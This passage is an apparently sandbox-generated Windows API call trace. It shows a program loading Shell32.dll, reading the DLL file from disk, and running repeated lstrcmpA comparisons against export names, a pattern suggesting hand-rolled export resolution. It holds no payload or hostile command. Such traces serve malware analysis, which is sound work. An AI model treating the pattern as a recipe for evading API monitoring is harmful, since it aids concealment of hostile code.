returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.729] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0082.729] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0082.729] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0082.729] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0082.729] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0085.761] GetProcessHeap () returned 0x440000 [0085.761] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x403d040 | out: hHeap=0x440000) returned 1 [0085.942] GetProcessHeap () returned 0x440000 [0085.942] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x4590e0 [0085.943] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0085.943] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0085.943] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0085.943] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0085.943] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0085.944] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0085.944] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0085.944] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0085.944] GetProcessHeap () returned 0x440000 [0085.944] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1587258) returned 0x4037040 [0086.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0086.163] ReadFile (in: hFile=0x140, lpBuffer=0x4037040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4037040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0089.642] CloseHandle (hObject=0x140) returned 1 [0089.642] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0089.643] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0089.643] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0089.643] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0089.643] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0089.643] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0089.643] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0089.643] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0089.643] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.643] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0089.643] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0089.643] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0089.643] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.643] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0089.643] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0089.644] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0089.644] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0089.644] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.644] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0089.644] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.644] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0089.644] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0089.644] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0089.644] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.644] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0089.644] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0089.644] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.644] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0089.644] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0089.644] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0089.644] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.644] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0089.644] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.644] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.645] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0089.645] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0089.645] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0089.646] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0089.647] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0089.648] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0089.649] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0089.650] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0089.650] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.650] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.650] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0089.650] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0089.806] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0089.806] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0089.806] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0089.806] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0089.806] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.806] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.807] lstrcmpA 